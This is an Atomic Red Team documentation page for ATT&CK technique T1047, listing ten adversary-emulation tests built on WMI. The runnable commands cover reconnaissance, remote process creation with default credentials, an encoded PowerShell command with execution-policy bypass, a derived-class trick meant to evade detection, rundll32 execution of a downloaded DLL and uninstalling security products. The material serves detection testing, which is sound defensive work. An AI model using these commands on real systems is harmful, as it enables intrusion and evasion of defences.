security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1047/T1047.md
T
Atomic Red Team doc generator 5ede8f21e4 Generated docs from job=generate-docs branch=master [ci skip]
2025-02-13 22:03:40 +00:00

425 lines
13 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# T1047 - Windows Management Instrumentation
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1047)
<blockquote>
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)
**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - WMI Reconnaissance Users](#atomic-test-1---wmi-reconnaissance-users)
- [Atomic Test #2 - WMI Reconnaissance Processes](#atomic-test-2---wmi-reconnaissance-processes)
- [Atomic Test #3 - WMI Reconnaissance Software](#atomic-test-3---wmi-reconnaissance-software)
- [Atomic Test #4 - WMI Reconnaissance List Remote Services](#atomic-test-4---wmi-reconnaissance-list-remote-services)
- [Atomic Test #5 - WMI Execute Local Process](#atomic-test-5---wmi-execute-local-process)
- [Atomic Test #6 - WMI Execute Remote Process](#atomic-test-6---wmi-execute-remote-process)
- [Atomic Test #7 - Create a Process using WMI Query and an Encoded Command](#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command)
- [Atomic Test #8 - Create a Process using obfuscated Win32_Process](#atomic-test-8---create-a-process-using-obfuscated-win32_process)
- [Atomic Test #9 - WMI Execute rundll32](#atomic-test-9---wmi-execute-rundll32)
- [Atomic Test #10 - Application uninstall using WMIC](#atomic-test-10---application-uninstall-using-wmic)
<br/>
## Atomic Test #1 - WMI Reconnaissance Users
An adversary might use WMI to list all local User Accounts.
When the test completes , there should be local user accounts information displayed on the command line.
**Supported Platforms:** Windows
**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic useraccount get /ALL /format:csv
```
<br/>
<br/>
## Atomic Test #2 - WMI Reconnaissance Processes
An adversary might use WMI to list Processes running on the compromised host.
When the test completes , there should be running processes listed on the command line.
**Supported Platforms:** Windows
**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic process get caption,executablepath,commandline /format:csv
```
<br/>
<br/>
## Atomic Test #3 - WMI Reconnaissance Software
An adversary might use WMI to list installed Software hotfix and patches.
When the test completes, there should be a list of installed patches and when they were installed.
**Supported Platforms:** Windows
**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic qfe get description,installedOn /format:csv
```
<br/>
<br/>
## Atomic Test #4 - WMI Reconnaissance List Remote Services
An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
if the provided remote host is unreachable
**Supported Platforms:** Windows
**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | string | 127.0.0.1|
| service_search_string | Name Of Service | string | Spooler|
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
```
<br/>
<br/>
## Atomic Test #5 - WMI Execute Local Process
This test uses wmic.exe to execute a process on the local host.
When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
**Supported Platforms:** Windows
**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_to_execute | Name or path of process to execute. | string | notepad.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic process call create #{process_to_execute}
```
#### Cleanup Commands:
```cmd
wmic process where name='#{process_to_execute}' delete >nul 2>&1
```
<br/>
<br/>
## Atomic Test #6 - WMI Execute Remote Process
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
To clean up, provide the same node input as the one provided to run the test
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
**Supported Platforms:** Windows
**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | string | 127.0.0.1|
| user_name | Username | string | DOMAIN&#92;Administrator|
| password | Password | string | P@ssw0rd1|
| process_to_execute | Name or path of process to execute. | string | notepad.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
```
#### Cleanup Commands:
```cmd
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
```
<br/>
<br/>
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand <encoded command>
Where the EncodedCommand, once decoded, would resemble:
Invoke-WMIMethod win32_process -name create -argumentlist rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs -ComputerName WORKSTATION
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test.
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
**Supported Platforms:** Windows
**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
#### Attack Commands: Run with `command_prompt`!
```cmd
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
```
<br/>
<br/>
## Atomic Test #8 - Create a Process using obfuscated Win32_Process
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
**Supported Platforms:** Windows
**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_class | Derived class name | string | Win32_Atomic|
| process_to_execute | Name or path of process to execute. | string | notepad.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
```
#### Cleanup Commands:
```powershell
$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
try { $CleanupClass.Delete() } catch {}
```
<br/>
<br/>
## Atomic Test #9 - WMI Execute rundll32
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
**Supported Platforms:** Windows
**auto_generated_guid:** 00738d2a-4651-4d76-adf2-c43a41dfb243
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | string | 127.0.0.1|
| dll_to_execute | Path to DLL. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;calc.dll|
| function_to_execute | Name of DLL function to call | string | StartW|
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
```
#### Cleanup Commands:
```cmd
taskkill /f /im calculator.exe
```
#### Dependencies: Run with `powershell`!
##### Description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
```
<br/>
<br/>
## Atomic Test #10 - Application uninstall using WMIC
Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
**Supported Platforms:** Windows
**auto_generated_guid:** c510d25b-1667-467d-8331-a56d3e9bc4ff
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Computer the action is being executed against but defaults to the localhost. | string | 127.0.0.1|
| product | Enter the product name being uninstalled. This will default to TightVNC. | string | Tightvnc|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
```
#### Cleanup Commands:
```cmd
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
```
#### Dependencies: Run with `powershell`!
##### Description: TightVNC must be installed.
##### Check Prereq Commands:
```powershell
if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
start-sleep -s 10
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
start-sleep -s 15
```
<br/>
Reference in New Issue View Git Blame Copy Permalink